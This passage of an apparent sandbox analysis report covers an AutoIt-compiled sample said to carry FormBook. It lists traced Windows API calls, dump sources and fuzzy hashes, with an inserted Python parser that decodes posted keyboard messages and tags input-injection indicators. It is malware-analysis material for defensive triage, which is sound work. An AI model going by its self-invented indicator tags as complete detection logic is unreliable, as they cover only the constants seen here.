                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC2DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC2DE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: b63ab67f85c08d2e7f531a523bb49b5f28934ae0414265ad34507185d6d90794
                                                      • Instruction ID: d9e5eb460eb366d4d89fb253c6330db421abd63cafde33c6752ec68e23680a46
                                                      • Opcode Fuzzy Hash: b63ab67f85c08d2e7f531a523bb49b5f28934ae0414265ad34507185d6d90794
                                                      • Instruction Fuzzy Hash: 1831A072201214BFEB114F51CD8AFEB3FADEF19715F144069FE09AA291C6769C42CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: e3d6169a187d823ba8bf1118bd365e622729dc18e29ac9ba480fc934b36b8f98
                                                      • Instruction ID: d72b6c8c0fd9f4931492104dfafab0ecbd37869629d7aacf167f7816ee5d8dc5
                                                      • Opcode Fuzzy Hash: e3d6169a187d823ba8bf1118bd365e622729dc18e29ac9ba480fc934b36b8f98
                                                      • Instruction Fuzzy Hash: 7B21FC63741B0577DA155D209E92FFA739DAF10389F442025FD047A642F731EE1583A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: a8a50648ccaf41c17912529238f417a1989c2586b893f26a2f1b49979af34fb1
                                                      • Instruction ID: 16a89c6c1c6ef2f56b85ec73d6e52841311129f2928ec7909f7ffe2f5f8c5138
                                                      • Opcode Fuzzy Hash: a8a50648ccaf41c17912529238f417a1989c2586b893f26a2f1b49979af34fb1
                                                      • Instruction Fuzzy Hash: 6BD19C72A0060A9FDF14DFA8C880BEEB7B5BF48348F149469E915BB281E771DD45CB90
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E715CE
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71651
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E717FB,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E716E4
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E716FB
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71777
                                                      • __freea.LIBCMT ref: 00E717A2
                                                      • __freea.LIBCMT ref: 00E717AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: 4ca92328f648dffcc5e7df58c2ea4de41129468c0425c86f594d4ba0eafa7ab2
                                                      • Instruction ID: bd66a3c1d031734d10b0b89820bd2405f4673e4a380107101934d932fc85ae6c
                                                      • Opcode Fuzzy Hash: 4ca92328f648dffcc5e7df58c2ea4de41129468c0425c86f594d4ba0eafa7ab2
                                                      • Instruction Fuzzy Hash: 8191D571E003069EDB288EBCC841AEE7BF5AF45754F18A599E809F7180D735DC44C7A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      • Opcode ID: 7e30b6e72053cb667ac79a08f112aa5d1dc76e3833495e42693bde02cc6674e0
                                                      • Instruction ID: bc545f3a104bec2403026d9aefa5d87141439fbf904ebcf03e32d2d23d5745fd
                                                      • Opcode Fuzzy Hash: 7e30b6e72053cb667ac79a08f112aa5d1dc76e3833495e42693bde02cc6674e0
                                                      • Instruction Fuzzy Hash: B09192B1A00219ABDF24CFA5C844FEF7BB8EF46714F10955AF505BB282D7709945CBA0
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00EA125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00EA12A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA12D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA13C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00EA1430
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      • Opcode ID: 9ee7bf5e7eb78bdbf3c759d49c2f26c1a9a4958d4374e2e53e2908a2c9d1d383
                                                      • Instruction ID: 00e98595f4c4f8ba7ca951b57b7c397104898950a940242d7fe932800615cc51
                                                      • Opcode Fuzzy Hash: 9ee7bf5e7eb78bdbf3c759d49c2f26c1a9a4958d4374e2e53e2908a2c9d1d383
                                                      • Instruction Fuzzy Hash: 7191CF71A00208AFDB049FA8C884BBEB7B5FF4A715F105069E951FB291D774E945CB90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 6f82d9e3f4a68ca1ca2c452874c9c6feaa7c79bc1d53787c0e07d9ed4c1804f1
                                                      • Instruction ID: 284eb5d3886a00fcb3018109f5fe3ce97aaee497aa1715aef60e37590f254ed8
                                                      • Opcode Fuzzy Hash: 6f82d9e3f4a68ca1ca2c452874c9c6feaa7c79bc1d53787c0e07d9ed4c1804f1
                                                      • Instruction Fuzzy Hash: C2914971D00219EFCB10CFA9DC84AEEBBB8FF49324F245159E519B7252D379A942CB60
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00EB396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EB3A7A
                                                      • _wcslen.LIBCMT ref: 00EB3A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3C1F
                                                        • Part of subcall function 00EA0CDF: VariantInit.OLEAUT32(00000000), ref: 00EA0D1F
                                                        • Part of subcall function 00EA0CDF: VariantCopy.OLEAUT32(?,?), ref: 00EA0D28
                                                        • Part of subcall function 00EA0CDF: VariantClear.OLEAUT32(?), ref: 00EA0D34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      • Opcode ID: 12d9cde862843d32a365a2f9d9982e687ac2c1b6ce8e1de5cf4dca5e7ab2ea32
                                                      • Instruction ID: 444142944e29ff71c92f13e0c5ce85c87e0caeb9b61e65cab3011f78cd69e2af
                                                      • Opcode Fuzzy Hash: 12d9cde862843d32a365a2f9d9982e687ac2c1b6ce8e1de5cf4dca5e7ab2ea32
                                                      • Instruction Fuzzy Hash: ED9157756083059FCB04DF28C4859AABBE5FF88314F14982DF889AB351DB31EE45CB92
                                                      APIs
                                                        • Part of subcall function 00E9000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?,?,00E9035E), ref: 00E9002B
                                                        • Part of subcall function 00E9000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90046
                                                        • Part of subcall function 00E9000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90054
                                                        • Part of subcall function 00E9000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?), ref: 00E90064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EB4C51
                                                      • _wcslen.LIBCMT ref: 00EB4D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EB4DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00EB4DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      • Opcode ID: bd5460dc49a65981bb48a211bb83a6abbe423d9673b3042e9db607b34239d088
                                                      • Instruction ID: 2d746c27052478840562c88a1ae9e89694559e7d11fa5828a6a24d733f3928e5
                                                      • Opcode Fuzzy Hash: bd5460dc49a65981bb48a211bb83a6abbe423d9673b3042e9db607b34239d088
                                                      • Instruction Fuzzy Hash: 679128B1D0021DAFDF14DFA4C885AEEBBB8BF48314F105169E915BB291DB709A45CF60
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00EC2183
                                                      • GetMenuItemCount.USER32(00000000), ref: 00EC21B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EC21DD
                                                      • _wcslen.LIBCMT ref: 00EC2213
                                                      • GetMenuItemID.USER32(?,?), ref: 00EC224D
                                                      • GetSubMenu.USER32(?,?), ref: 00EC225B
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC22E3
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      • Opcode ID: 05c8371a0b5ca81810982d10ee5b0437b916f8e366e1ff3d6c357eef9c0937d1
                                                      • Instruction ID: 20558e5e328eb67883336309d132356bb171fc36f85e3962d0c8cda2177c64e4
                                                      • Opcode Fuzzy Hash: 05c8371a0b5ca81810982d10ee5b0437b916f8e366e1ff3d6c357eef9c0937d1
                                                      • Instruction Fuzzy Hash: 66719D75A00205AFCB14EF64C945EAEBBF1EF48324F14946CE916BB351D736ED428B90
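Added example (not part of the Joe Sandbox report and not code from the sample or the AutoIt runtime): a small Python parser for the "Executed Functions" records in this section. It reads the `• Name.MODULE(args), ref: addr` lines (including the indented "Part of subcall function" entries), keeps the opcode and instruction fuzzy hashes for matching the same function across reports, and decodes the window-message constant passed to SendMessageW/PostMessageW. On this page that resolves 0x111 to WM_COMMAND in the GetMenu record above and 0x101 to WM_KEYUP with VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN in the GetKeyboardState/SetKeyboardState record that follows, which is the modifier-release sequence of the AutoIt interpreter's Send/ControlSend code rather than anything specific to the FormBook payload. The embedded sample text is copied from those two records (with the "Associated" dump lines omitted); the message and virtual-key tables cover only the constants seen here, and the indicator names are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the PostMessageW/WM_COMMAND record above and the
# GetKeyboardState/WM_KEYUP record that follows it, copied from this report
# with the "Associated" dump lines left out (the parser ignores them anyway).
SAMPLE = """\
APIs
• GetMenu.USER32(?), ref: 00EC2183
• GetMenuItemCount.USER32(00000000), ref: 00EC21B5
  • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC22E3
  • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
Memory Dump Source
• Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• Opcode Fuzzy Hash: 05c8371a0b5ca81810982d10ee5b0437b916f8e366e1ff3d6c357eef9c0937d1
• Instruction Fuzzy Hash: 66719D75A00205AFCB14EF64C945EAEBBF1EF48324F14946CE916BB351D736ED428B90
APIs
• GetParent.USER32(?), ref: 00E9AEF9
• GetKeyboardState.USER32(?), ref: 00E9AF0E
• SetKeyboardState.USER32(?), ref: 00E9AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00E9AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00E9AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00E9AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E9B020
Similarity
• API ID: MessagePost$KeyboardState$Parent
• Opcode Fuzzy Hash: 1b34bbe3aca3d75d7b27d5930aa1886dbe2088ca9c35188b2b8bb652362de3be
"""

# One "• Name.MODULE(args), ref: ADDR" line; the argument list is optional
# (e.g. "Sleep.KERNEL32 ref: ...") and the subcall prefix marks callee entries.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
START_HEADERS = {"APIs", "Strings", "Memory Dump Source"}
OTHER_HEADERS = {"Joe Sandbox IDA Plugin", "Similarity"}
FIELDS = {
    "• API ID:": "api_id", "• String ID:": "string_id", "• Source File:": "source_file",
    "• Opcode Fuzzy Hash:": "opcode_hash", "• Instruction Fuzzy Hash:": "instruction_hash",
}
# Only the message/VK constants that occur in the records on this page.
WM_NAMES = {0x0030: "WM_SETFONT", 0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the tracer printed "?"
    ref: str
    subcall: Optional[str] = None   # address of the callee when nested


@dataclass
class Record:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    source_file: str = ""
    opcode_hash: str = ""
    instruction_hash: str = ""


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    """Hex words become ints (negative HRESULT-style values included), '?' becomes None."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a.strip(), 16) for a in text.split(",")]


def parse_records(text: str) -> List[Record]:
    """A record ends once its Opcode Fuzzy Hash was seen and the next section header starts."""
    records: List[Record] = []
    cur: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in START_HEADERS and (cur is None or cur.opcode_hash):
            cur = Record()
            records.append(cur)
            continue
        if line in START_HEADERS or line in OTHER_HEADERS:
            continue
        if cur is None:
            cur = Record()
            records.append(cur)
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["name"], m["mod"], parse_args(m["args"]), m["ref"], m["sub"]))
            continue
        for prefix, attr in FIELDS.items():
            if line.startswith(prefix):
                setattr(cur, attr, line[len(prefix):].strip())
                break
    return records


def decode_messages(rec: Record):
    """(api, message name, key name for keyboard messages, ref) for each Send/PostMessage call."""
    out = []
    for c in rec.calls:
        if c.name not in ("SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA"):
            continue
        if len(c.args) < 2 or c.args[1] is None:
            continue
        msg = WM_NAMES.get(c.args[1], "0x%04X" % c.args[1])
        key = ""
        if msg in ("WM_KEYDOWN", "WM_KEYUP") and len(c.args) > 2 and c.args[2] is not None:
            key = VK_NAMES.get(c.args[2], "vk 0x%02X" % c.args[2])
        out.append((c.name, msg, key, c.ref))
    return out


def indicators(rec: Record) -> set:
    """Tags used by this example (its own naming, not Joe Sandbox signature names)."""
    names = {c.name for c in rec.calls}
    tags = set()
    if "AttachThreadInput" in names:
        tags.add("thread_input_attach")      # joins the target window's input queue
    if "SetKeyboardState" in names:
        tags.add("keyboard_state_write")     # rewrites the synchronous key-state table
    if any(m[1] in ("WM_KEYDOWN", "WM_KEYUP") for m in decode_messages(rec)):
        tags.add("synthetic_keys")           # keystrokes injected via posted messages
    return tags


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id, rec.opcode_hash[:16], sorted(indicators(rec)))
        for api, msg, key, ref in decode_messages(rec):
            print("   ", api, msg, key, "@", ref)
```

Run it on a report saved as text and the `synthetic_keys` / `thread_input_attach` records group together as the AutoIt UI-automation runtime; the functions worth reversing for FormBook behaviour are the ones whose API IDs do not carry those tags. The fuzzy hashes can be kept in a set to skip records already examined in an earlier report of the same AutoIt build.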
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00E9AEF9
                                                      • GetKeyboardState.USER32(?), ref: 00E9AF0E
                                                      • SetKeyboardState.USER32(?), ref: 00E9AF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E9AF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E9AFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E9AFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E9B020
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 1b34bbe3aca3d75d7b27d5930aa1886dbe2088ca9c35188b2b8bb652362de3be
                                                      • Instruction ID: 2ccec73306498dd03474ba0aba2f3b8ce7259050cce2e3def54d014e6b1be014
                                                      • Opcode Fuzzy Hash: 1b34bbe3aca3d75d7b27d5930aa1886dbe2088ca9c35188b2b8bb652362de3be
                                                      • Instruction Fuzzy Hash: 2D51E0A0A047D57DFF364234CC49BBABEE95F06308F0C9499E1D9658C2C399A8C8D791
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00E9AD19
                                                      • GetKeyboardState.USER32(?), ref: 00E9AD2E
                                                      • SetKeyboardState.USER32(?), ref: 00E9AD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E9ADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E9ADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9AE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9AE38
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 510fcbc4d0b42d85ceafc2e6f9a886d50c769f99a76d2c6350d81e6035d83dcf
                                                      • Instruction ID: 38cea8bccadbae6067f01b590d58aac7338927a8e9c98f81be6fc658a943e4df
                                                      • Opcode Fuzzy Hash: 510fcbc4d0b42d85ceafc2e6f9a886d50c769f99a76d2c6350d81e6035d83dcf
                                                      • Instruction Fuzzy Hash: BC51D6A15047D53DFF3683348C55B7A7ED85F46308F0C94A9E1D5668C2D294ECC8D792
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00E73CD6,?,?,?,?,?,?,?,?,00E65BA3,?,?,00E73CD6,?,?), ref: 00E65470
                                                      • __fassign.LIBCMT ref: 00E654EB
                                                      • __fassign.LIBCMT ref: 00E65506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00E73CD6,00000005,00000000,00000000), ref: 00E6552C
